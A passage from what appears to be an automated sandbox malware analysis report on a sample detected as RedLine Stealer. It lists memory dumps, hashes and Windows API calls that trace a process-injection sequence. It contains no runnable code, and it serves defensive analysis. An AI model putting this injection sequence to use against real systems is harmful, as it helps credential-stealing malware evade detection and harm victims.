                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:05:29:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6ee680000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true


                                                                        Execution Graph

                                                                        Execution Coverage:10.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:2%
                                                                        Total number of Nodes:251
                                                                        Total number of Limit Nodes:15
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d121a9d0c5b67ef281792554a24c074aae4664988bd1a8baee211a85e66dc7d4
                                                                        • Instruction ID: 5bafd18b06d0681ad362be890b8dac061338ee9daba9b9617234f12d3ee59891
                                                                        • Opcode Fuzzy Hash: d121a9d0c5b67ef281792554a24c074aae4664988bd1a8baee211a85e66dc7d4
                                                                        • Instruction Fuzzy Hash: 6C3172B1D097588FFB19CF6798007DABFB7AFC6200F04C0AAD458AA261DB340596CF61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 15c0b9513cbe8adcb535374d022995808a598fa027c3e40fb4bd7dcba42a82a0
                                                                        • Instruction ID: a2540da03f68bc8e576a7927592338b4a31c740eb9b3e01a92888350b548bc72
                                                                        • Opcode Fuzzy Hash: 15c0b9513cbe8adcb535374d022995808a598fa027c3e40fb4bd7dcba42a82a0
                                                                        • Instruction Fuzzy Hash: 4FF0B2B6919118CFEB11CF54C880AE8BBB9BB0A304F045199E459A7252C335AA92CF14

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 02DFD2FE
                                                                        • GetCurrentThread.KERNEL32 ref: 02DFD33B
                                                                        • GetCurrentProcess.KERNEL32 ref: 02DFD378
                                                                        • GetCurrentThreadId.KERNEL32 ref: 02DFD3D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 9a2b620051e7011f588804444c629a12f7b0b65f14f959d41ed11d6f4c0e8525
                                                                        • Instruction ID: e9952a36aee98de4d89d29a5c217b15dde4bdf47adc2d5c55c69e521d8b40399
                                                                        • Opcode Fuzzy Hash: 9a2b620051e7011f588804444c629a12f7b0b65f14f959d41ed11d6f4c0e8525
                                                                        • Instruction Fuzzy Hash: BE5165B0900709CFEB54CFA9D548BEEBBF1BB88304F248059E509A73A1DB749944CB66

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 02DFD2FE
                                                                        • GetCurrentThread.KERNEL32 ref: 02DFD33B
                                                                        • GetCurrentProcess.KERNEL32 ref: 02DFD378
                                                                        • GetCurrentThreadId.KERNEL32 ref: 02DFD3D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 922af3971aa0cb6040e049dd6696c84893cc3a0a578c17c4903800a40766a073
                                                                        • Instruction ID: 072a6d13bfe4b0f93bf5ec31c367a0cc93df9ba45ac32c97b1ae14552b2861c0
                                                                        • Opcode Fuzzy Hash: 922af3971aa0cb6040e049dd6696c84893cc3a0a578c17c4903800a40766a073
                                                                        • Instruction Fuzzy Hash: AA5156B0900709CFDB54CFAAD548B9EBBF1BF88314F248059E509A7391DB746944CF66

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A17DFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: ac661a7849e87c19275d0d1a32e9caf2b3dbca65bff127f66dd73fbe0fdae2bd
                                                                        • Instruction ID: 3192651eeff8bc0a0a1d9f37a4530d6ac0af8c8d139af36ce870a9f666a28fae
                                                                        • Opcode Fuzzy Hash: ac661a7849e87c19275d0d1a32e9caf2b3dbca65bff127f66dd73fbe0fdae2bd
                                                                        • Instruction Fuzzy Hash: B9A14EB1D00219DFEB10DF69C8417EEBBF2BF88310F1485A9D858A7280DB759985CF92

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A17DFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0

                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02DFB246
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0

                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 02DF5DA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0

                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 02DF5DA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0

                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A179D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0

                                                                        APIs
                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,077738ED,?,?), ref: 0777399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1464117964.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7770000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: DrawText
                                                                        • String ID:
                                                                        • API String ID: 2175133113-0

                                                                        APIs
                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,077738ED,?,?), ref: 0777399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1464117964.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7770000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: DrawText
                                                                        • String ID:
                                                                        • API String ID: 2175133113-0

                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A173EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0

                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A179D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0

                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A17AB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A173EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A17AB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02DFD54F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02DFD54F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A178EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 70fbd013471b068fe00ca7f478eefcc4a1437436d6913ffff0ef8537f7d2445e
                                                                        • Instruction ID: 637b3d9ddeee9417d5a7e26e672414b6165f037ad74570b6b389d61167e12cdd
                                                                        • Opcode Fuzzy Hash: 70fbd013471b068fe00ca7f478eefcc4a1437436d6913ffff0ef8537f7d2445e
                                                                        • Instruction Fuzzy Hash: 6A117CB19043498FDB24DFAAC8457EFFFF5AF88210F24885DD455A7240C7796901CBA5
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A178EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 2b7a43ad04caa0b61e12154d034f3b8c0e78e258392c3c0836b1c8659b60cbd6
                                                                        • Instruction ID: 5606d5babd25a04814d3e82dc51db58352bbb4063afbb0c75d04603cc9e8c858
                                                                        • Opcode Fuzzy Hash: 2b7a43ad04caa0b61e12154d034f3b8c0e78e258392c3c0836b1c8659b60cbd6
                                                                        • Instruction Fuzzy Hash: 5C1123729003499FDB10DFAAC845BEFBBF5AB88320F148819E519A7250C775A941CBA1
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 11abe41aa30531b4249cde12036b73efab179e22672dd394cacc7aac15c0ee31
                                                                        • Instruction ID: 60b1dbe43d3c2e31b1590fdedaa067f445e4b88dced0e67f1a07908783af51b1
                                                                        • Opcode Fuzzy Hash: 11abe41aa30531b4249cde12036b73efab179e22672dd394cacc7aac15c0ee31
                                                                        • Instruction Fuzzy Hash: BF113AB19003498FDB24DFAAD8457DFFBF5AB88210F148419D419A7240CB756941CBA5
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02DFB246
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: d5d71cd4c8dee71165e1c3e0d8f5946b805f0a9dae248f9305d11747ed4989c0
                                                                        • Instruction ID: 2d2ba5a73f38f8d1ddde2dbb3bc67a6f2e8e360a09ae3e9d9fc9e443d84f4366
                                                                        • Opcode Fuzzy Hash: d5d71cd4c8dee71165e1c3e0d8f5946b805f0a9dae248f9305d11747ed4989c0
                                                                        • Instruction Fuzzy Hash: 0A1110B6C00649CFDB10CF9AD844BDEFBF4AF88214F11841AD918A7700C375A545CFA5
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A1C0B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: 48ceac64a2278e4f0f7461d535bf046222f71019c1180a03890f239548f6337a
                                                                        • Instruction ID: 26ec447c056eea53296da29eb99679cc72cf071cd007632a36b919cb4598c308
                                                                        • Opcode Fuzzy Hash: 48ceac64a2278e4f0f7461d535bf046222f71019c1180a03890f239548f6337a
                                                                        • Instruction Fuzzy Hash: 5511E3B58006499FDB20DF9AD845BDEBBF8EB48320F108459E514A7240C375A944CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459355334.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_15ed000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5782d7a644d6d7160a3c5090ea4428d39f5df330fdc46528c10a293ac7c4ed60
                                                                        • Instruction ID: a14fdf6cfc33acd64f3160938f693d104a4a26a8f6defe3e3c5e07574b8f9eb0
                                                                        • Opcode Fuzzy Hash: 5782d7a644d6d7160a3c5090ea4428d39f5df330fdc46528c10a293ac7c4ed60
                                                                        • Instruction Fuzzy Hash: 58210672900244DFDB19DF54D9C4B2ABFF5FB84318F24C56AE8050F256C336D456CAA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459417245.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_15fd000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5effd9b7679ec0e017babf55c246c2d7b7b71257d4cd832ccf679e441052773c
                                                                        • Instruction ID: e61ed8bd828f40b9af7a0834f4d9565cf40d4dbffa93aed3f2cc293850cb66e8
                                                                        • Opcode Fuzzy Hash: 5effd9b7679ec0e017babf55c246c2d7b7b71257d4cd832ccf679e441052773c
                                                                        • Instruction Fuzzy Hash: 8E212571504304EFDB15DF64D880B26BBB9FB84314F20C96DEA094F246D336D407CA62
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459417245.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_15fd000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7dced32d7d4f906ce6df4a494168b63d574a5785792adb8375f9747adc13ac3a
                                                                        • Instruction ID: b12e7fecbbb92eec5dcd5cba2c5d07064b6f997bf5949330ef3b6fb26b88c6bd
                                                                        • Opcode Fuzzy Hash: 7dced32d7d4f906ce6df4a494168b63d574a5785792adb8375f9747adc13ac3a
                                                                        • Instruction Fuzzy Hash: 65214C75504304DFDB01DF94D5C0B29BBB1FB84324F20C96DDA094F246C336D846CAA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459417245.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_15fd000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f39f4b0bfcb943f53f2944c868d74a1a03dec9e735ef700662b29ad2cc45346
                                                                        • Instruction ID: 5c0e42b96c0325fdb979be74ee1780c940e6b4d936938bc8664587f251205c11
                                                                        • Opcode Fuzzy Hash: 6f39f4b0bfcb943f53f2944c868d74a1a03dec9e735ef700662b29ad2cc45346
                                                                        • Instruction Fuzzy Hash: A3218E755093809FCB03CF24D990715BF71FB46214F29C5EAD9498F6A7C33A980ACB62
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459355334.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_15ed000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                        • Instruction ID: a76463e43043d75f2156478ebe20023d946f3f5854160d3108af38d26e822128
                                                                        • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                        • Instruction Fuzzy Hash: F4119D76904280DFCB16CF54D9C4B1ABFB1FB84218F24C6AAD8490F656C33AD456CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459417245.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_15fd000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction ID: c943788672e78495d4fb8b84acb4cbf006f3252fc6aac91da76f0cb097d6ac52
                                                                        • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction Fuzzy Hash: D211A979504284DFCB02CF54D584B19BFB1FB84224F24C6AED9494F656C33AD84ACBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8460a0beec71fd4159067f4cc993aa5d2d172fe2a2c2fe68797071589d478abb
                                                                        • Instruction ID: 24f46a55a40d4431364591b3282499315ad9f00540e61b067e3136cc8c26520d
                                                                        • Opcode Fuzzy Hash: 8460a0beec71fd4159067f4cc993aa5d2d172fe2a2c2fe68797071589d478abb
                                                                        • Instruction Fuzzy Hash: 39D1BCB17006018FEB29EB75C850BAA77F6AF89700F14846DD16ADB790DB35E901CB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3b99a58c5075490e5bc0690b0a937757510c2a7a718edf6308a1ef877f6be45c
                                                                        • Instruction ID: c2903603424504733490a29e9a665a06437200f14909c950d60ce22ccc276523
                                                                        • Opcode Fuzzy Hash: 3b99a58c5075490e5bc0690b0a937757510c2a7a718edf6308a1ef877f6be45c
                                                                        • Instruction Fuzzy Hash: 74E1EBB4E002598FDB24CFA9C5809AEBBF2FF89305F248169D854AB355D734AD41CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: df3e0144a1b03d3b76feac78ca4edfff4bc1811db918761a041131f30f1dc988
                                                                        • Instruction ID: 3a08710e6fbd2ef356b44fddf58b917808bc442faaf951f6d775b0dc636f2587
                                                                        • Opcode Fuzzy Hash: df3e0144a1b03d3b76feac78ca4edfff4bc1811db918761a041131f30f1dc988
                                                                        • Instruction Fuzzy Hash: 2FE1C7B4E002598FDB24DFA9C5809AEBBF2FF89305F248169D814AB355D735AD41CFA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 33c72c34229869db4a4808febd5a0b27852b31afa33f1690149f21ba0430374a
                                                                        • Instruction ID: 90ccd8c95b51116f646e0e09ee07881d90d88dc3ee8c60c4a86ffc6d862d12eb
                                                                        • Opcode Fuzzy Hash: 33c72c34229869db4a4808febd5a0b27852b31afa33f1690149f21ba0430374a
                                                                        • Instruction Fuzzy Hash: A0E1EAB4E002598FDB24CFA9C580AAEBBF2FF89305F248169D814A7355D735AD41CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ed8c1e81a55b15e99359a8dc7d6e6911e046efbecb41fb453a56b910ede8c882
                                                                        • Instruction ID: 37aad2e664e4a1b25531f70ad1cc83b13523a331da7c51628d2c26f15f867774
                                                                        • Opcode Fuzzy Hash: ed8c1e81a55b15e99359a8dc7d6e6911e046efbecb41fb453a56b910ede8c882
                                                                        • Instruction Fuzzy Hash: EBE1D8B4E002598FDB24CFA9C5809AEBBF2FF89305F248169D815AB355D734AD41CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4cbdd16590d002bfe4349e7c7e350929e7ef2a5ae8f9b5ec3334a0f4d54366c6
                                                                        • Instruction ID: 70c9643a41c735fc752a3f74544b4eacef60cc29412ab3e63c9b8187e6088288
                                                                        • Opcode Fuzzy Hash: 4cbdd16590d002bfe4349e7c7e350929e7ef2a5ae8f9b5ec3334a0f4d54366c6
                                                                        • Instruction Fuzzy Hash: 66E1ECB4E002598FDB24DFA9C5809AEBBF2FF89305F248169D814A7355DB35AD41CF60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 11c00509d978e22ae2fcc5914081665c6b1f945eb6650859e7e605bc28a4a2f7
                                                                        • Instruction ID: 9442dea3b6692d91b424be09dd81cf336756c2bff89230ab5fbe03afd78aa5ef
